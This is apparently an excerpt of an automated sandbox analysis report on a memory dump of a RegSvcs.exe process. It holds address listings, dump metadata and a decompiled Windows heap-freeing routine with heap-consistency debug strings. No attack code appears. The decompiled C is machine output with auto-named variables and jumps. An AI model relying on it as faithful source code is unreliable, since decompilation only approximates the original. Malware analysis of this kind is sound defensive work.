                                          0x013b45df
                                          0x013b45e4
                                          0x013b45e6
                                          0x013b45e8
                                          0x013b45ed
                                          0x013b45ed
                                          0x013b45f2
                                          0x013b45f2
                                          0x013b45f7
                                          0x013b45fc
                                          0x013b4602
                                          0x013b4606
                                          0x013b4609
                                          0x013b460f
                                          0x013b46de
                                          0x013b46e3
                                          0x013b46e5
                                          0x013b46ec
                                          0x013b46ee
                                          0x013b46f6
                                          0x013b46f6
                                          0x013b46f6
                                          0x013b46f6
                                          0x013b46ec
                                          0x013b4615
                                          0x013b4615
                                          0x013b461d
                                          0x013b462e
                                          0x013b462e
                                          0x013b461d
                                          0x013b460f
                                          0x013b4609
                                          0x013b46fd
                                          0x00000000
                                          0x00000000
                                          0x013b4710
                                          0x013b471a
                                          0x013b4720
                                          0x013b4720
                                          0x013b4722
                                          0x013b472c
                                          0x00000000
                                          0x013b472e
                                          0x013b472e
                                          0x00000000
                                          0x013b472e
                                          0x013b472c
                                          0x013b4738
                                          0x013b473c
                                          0x013b474b
                                          0x013b4751
                                          0x013b4751
                                          0x00000000
                                          0x013b473c
                                          0x013b48f4
                                          0x013b48f4
                                          0x00000000
                                          0x013b48f4

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                          • API String ID: 0-1357697941
                                          • Opcode ID: ae79397acea5e61baba1ed3663f99ea16628b67169496c8891edcd01fcc6aee7
                                          • Instruction ID: 988cf7daf6881e427b30e1221ea15d573638a34e00706af3971966e943d59190
                                          • Opcode Fuzzy Hash: ae79397acea5e61baba1ed3663f99ea16628b67169496c8891edcd01fcc6aee7
                                          • Instruction Fuzzy Hash: B1F1233161064ADFDB25CF69C484BFAFBF5FF45318F048029E28697A42E730A945CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0131A309 Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E0131A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x13e8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E0131A830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E0131DF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E012F9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E012FA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x13e8748 - 1;
						if( *0x13e8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E012FB150();
								} else {
									E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E012FB150();
								__eflags =  *0x13e7bc8;
								if( *0x13e7bc8 == 0) {
									__eflags = 1;
									E013B2073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x13e8748 - 1;
							if( *0x13e8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E0132174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E01317D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E013B14FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E012F9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E012F9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x13e8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E012FB150();
											} else {
												E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E012FB150();
											_pop(_t491);
											__eflags =  *0x13e7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E013B2073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E013BA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E0131A830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E01317D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E01317D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E013B1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E01317D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E01317D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x13e8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E012FB150();
							} else {
								E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E012FB150();
							__eflags =  *0x13e7bc8;
							if( *0x13e7bc8 == 0) {
								__eflags = 0;
								E013B2073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x13e8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E012FB150();
												} else {
													E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E012FB150();
												__eflags =  *0x13e7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E013B2073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E013BA80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E0131A830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E0131B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E0131A830(_t553, _v64, _v24);
								_t286 = E01317D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E01317D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E013B1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E01317D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E01317D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E013B1411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E0132174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E0131B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E01317D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E013B14FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E013199BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E0131A830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E0132ABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                          0x0131a309
                                          0x0131a316
                                          0x0131a319
                                          0x0131a31d
                                          0x0131a32d
                                          0x0131a331
                                          0x01361e0d
                                          0x01361e10
                                          0x0131a3cb
                                          0x0131a3cb
                                          0x0131a3bd
                                          0x0131a3c3
                                          0x0131a3c3
                                          0x0131a33a
                                          0x01361e17
                                          0x01361e1b
                                          0x01361e1d
                                          0x01361e2f
                                          0x01361e34
                                          0x01361e36
                                          0x01361e3c
                                          0x01361e3c
                                          0x01361e3c
                                          0x01361e3c
                                          0x01361e36
                                          0x01361e42
                                          0x01361e45
                                          0x01361e47
                                          0x0131a3f8
                                          0x0131a3f8
                                          0x0131a3fb
                                          0x0131a3fd
                                          0x01361e50
                                          0x0131a403
                                          0x0131a411
                                          0x0131a411
                                          0x0131a411
                                          0x0131a41e
                                          0x0131a420
                                          0x0131a424
                                          0x0131a427
                                          0x0131a7c9
                                          0x0131a7cd
                                          0x0131a7d2
                                          0x0131a7d9
                                          0x0131a7e0
                                          0x0131a7e3
                                          0x0131a7ed
                                          0x0131a7f3
                                          0x0131a7f9
                                          0x0131a7ff
                                          0x0131a802
                                          0x0131a807
                                          0x0131a809
                                          0x0131a809
                                          0x0131a809
                                          0x0131a80f
                                          0x0131a80f
                                          0x0131a812
                                          0x0131a81c
                                          0x0131a821
                                          0x0131a824
                                          0x0131a42d
                                          0x0131a42d
                                          0x0131a42d
                                          0x0131a42d
                                          0x0131a42d
                                          0x0131a436
                                          0x0131a43a
                                          0x0131a609
                                          0x0131a60d
                                          0x0131a612
                                          0x0131a616
                                          0x0131a61a
                                          0x01361e57
                                          0x01361e59
                                          0x00000000
                                          0x00000000
                                          0x01361e5f
                                          0x0131a620
                                          0x0131a627
                                          0x01361e64
                                          0x01361e66
                                          0x01361e6c
                                          0x01361e72
                                          0x01361e76
                                          0x01361e95
                                          0x01361e9a
                                          0x01361e78
                                          0x01361e8d
                                          0x01361e92
                                          0x01361ea0
                                          0x01361ea5
                                          0x01361eaa
                                          0x01361eb2
                                          0x01361eb6
                                          0x01361eb9
                                          0x01361eb9
                                          0x01361ebe
                                          0x01361ec2
                                          0x01361ec2
                                          0x01361e66
                                          0x0131a62d
                                          0x0131a633
                                          0x0131a636
                                          0x0131a63a
                                          0x0131a63c
                                          0x0131a640
                                          0x0131a642
                                          0x0131a644
                                          0x0131a644
                                          0x0131a644
                                          0x0131a64d
                                          0x0131a64d
                                          0x0131a651
                                          0x0131a655
                                          0x01361eca
                                          0x01361ed1
                                          0x00000000
                                          0x00000000
                                          0x01361ed7
                                          0x00000000
                                          0x0131a65b
                                          0x0131a669
                                          0x0131a66e
                                          0x0131a670
                                          0x00000000
                                          0x00000000
                                          0x0131a676
                                          0x0131a67b
                                          0x0131a680
                                          0x0131a682
                                          0x01361f1a
                                          0x0131a688
                                          0x0131a688
                                          0x0131a688
                                          0x0131a68a
                                          0x0131a68d
                                          0x01361f24
                                          0x01361f2a
                                          0x01361f31
                                          0x01361f43
                                          0x01361f43
                                          0x01361f31
                                          0x0131a693
                                          0x0131a697
                                          0x0131a69d
                                          0x0131a6a0
                                          0x0131a6a6
                                          0x0131a6a8
                                          0x0131a6a8
                                          0x0131a6a8
                                          0x0131a6a8
                                          0x0131a6b2
                                          0x0131a6b7
                                          0x0131a6c1
                                          0x0131a6c6
                                          0x0131a6d2
                                          0x0131a6d9
                                          0x0131a6e3
                                          0x0131a6e6
                                          0x0131a6eb
                                          0x0131a6ed
                                          0x0131a6ed
                                          0x0131a6ed
                                          0x0131a6ed
                                          0x0131a6f3
                                          0x0131a6f8
                                          0x0131a702
                                          0x0131a70a
                                          0x0131a70e
                                          0x0131a71a
                                          0x0131a71e
                                          0x01361fcb
                                          0x01361fcf
                                          0x01361fdd
                                          0x01361fe3
                                          0x01361fe3
                                          0x0131a724
                                          0x0131a728
                                          0x0131a72a
                                          0x0131a72d
                                          0x0131a737
                                          0x0131a73a
                                          0x0131a73c
                                          0x0131a742
                                          0x0131a748
                                          0x01361f4d
                                          0x01361f50
                                          0x01361f56
                                          0x01361f5c
                                          0x01361f5f
                                          0x01361f7e
                                          0x01361f83
                                          0x01361f61
                                          0x01361f76
                                          0x01361f7b
                                          0x01361f89
                                          0x01361f8e
                                          0x01361f93
                                          0x01361f94
                                          0x01361f9a
                                          0x01361f9c
                                          0x01361f9e
                                          0x01361fa1
                                          0x01361fa1
                                          0x01361fa6
                                          0x01361fa6
                                          0x01361f50
                                          0x0131a74e
                                          0x0131a751
                                          0x0131a754
                                          0x0131a75d
                                          0x0131a75e
                                          0x0131a762
                                          0x0131a767
                                          0x01361faf
                                          0x01361fb0
                                          0x01361fb9
                                          0x01361fbe
                                          0x01361fc2
                                          0x01361fc2
                                          0x0131a76d
                                          0x0131a76d
                                          0x0131a775
                                          0x0131a778
                                          0x0131a77d
                                          0x0131a77d
                                          0x0131a71e
                                          0x0131a782
                                          0x0131a787
                                          0x0131a789
                                          0x01361ff3
                                          0x0131a78f
                                          0x0131a78f
                                          0x0131a78f
                                          0x0131a791
                                          0x0131a794
                                          0x01361ffd
                                          0x01362006
                                          0x0136200c
                                          0x01362017
                                          0x01362019
                                          0x01362024
                                          0x01362024
                                          0x01362024
                                          0x01362047
                                          0x01362047
                                          0x0136200c
                                          0x0131a79a
                                          0x0131a79f
                                          0x0131a7a4
                                          0x0131a7a9
                                          0x0131a7ab
                                          0x0136205a
                                          0x0131a7b1
                                          0x0131a7b1
                                          0x0131a7b1
                                          0x0131a7b3
                                          0x0131a7b6
                                          0x00000000
                                          0x0131a7bc
                                          0x01362066
                                          0x01362068
                                          0x01362073
                                          0x01362073
                                          0x01362073
                                          0x01362078
                                          0x01362079
                                          0x0136207d
                                          0x00000000
                                          0x0136207d
                                          0x0131a7b6
                                          0x0131a440
                                          0x0131a440
                                          0x0131a440
                                          0x0131a446
                                          0x0131a44c
                                          0x0131a44f
                                          0x0131a453
                                          0x0131a455
                                          0x013620b3
                                          0x013620b9
                                          0x013620b9
                                          0x0131a45d
                                          0x0131a460
                                          0x0131a464
                                          0x0131a466
                                          0x0131a46b
                                          0x0131a46f
                                          0x0131a471
                                          0x0131a471
                                          0x0131a471
                                          0x0131a474
                                          0x0131a479
                                          0x0131a47d
                                          0x0131a47f
                                          0x01362229
                                          0x0136222f
                                          0x0131a3c8
                                          0x0131a3c8
                                          0x0131a3ca
                                          0x0131a3ca
                                          0x00000000
                                          0x0131a3ca
                                          0x01362235
                                          0x0136223a
                                          0x0136223a
                                          0x00000000
                                          0x00000000
                                          0x01362240
                                          0x01362246
                                          0x0136224a
                                          0x01362269
                                          0x0136226e
                                          0x0136224c
                                          0x01362261
                                          0x01362266
                                          0x01362274
                                          0x01362279
                                          0x0136227e
                                          0x01362286
                                          0x01362288
                                          0x0136228d
                                          0x0136228d
                                          0x01362292
                                          0x01362292
                                          0x01362295
                                          0x01362295
                                          0x00000000
                                          0x01362295
                                          0x0131a485
                                          0x0131a489
                                          0x0131a48b
                                          0x0131a48f
                                          0x0131a493
                                          0x0131a497
                                          0x0131a49b
                                          0x0131a4bb
                                          0x0131a4bb
                                          0x0131a4bd
                                          0x0131a4ff
                                          0x0131a4ff
                                          0x0131a501
                                          0x0131a505
                                          0x0131a50f
                                          0x0131a517
                                          0x0131a51b
                                          0x0131a527
                                          0x0131a52b
                                          0x01362182
                                          0x01362185
                                          0x01362193
                                          0x01362199
                                          0x01362199
                                          0x0131a531
                                          0x0131a535
                                          0x0131a538
                                          0x0131a548
                                          0x0131a54b
                                          0x0131a54d
                                          0x0131a553
                                          0x0131a559
                                          0x01362100
                                          0x01362103
                                          0x01362109
                                          0x0136210f
                                          0x01362112
                                          0x01362131
                                          0x01362136
                                          0x01362114
                                          0x01362129
                                          0x0136212e
                                          0x0136213c
                                          0x01362141
                                          0x01362147
                                          0x0136214d
                                          0x01362151
                                          0x01362154
                                          0x01362154
                                          0x01362159
                                          0x01362159
                                          0x01362103
                                          0x0131a55f
                                          0x0131a562
                                          0x0131a565
                                          0x0131a567
                                          0x01362162
                                          0x0131a56d
                                          0x0131a574
                                          0x0131a575
                                          0x0131a579
                                          0x0131a57e
                                          0x01362169
                                          0x0136216a
                                          0x01362170
                                          0x01362175
                                          0x01362179
                                          0x01362179
                                          0x0131a57e
                                          0x0131a584
                                          0x0131a58f
                                          0x0131a58f
                                          0x0131a52b
                                          0x0131a5ad
                                          0x0131a5bc
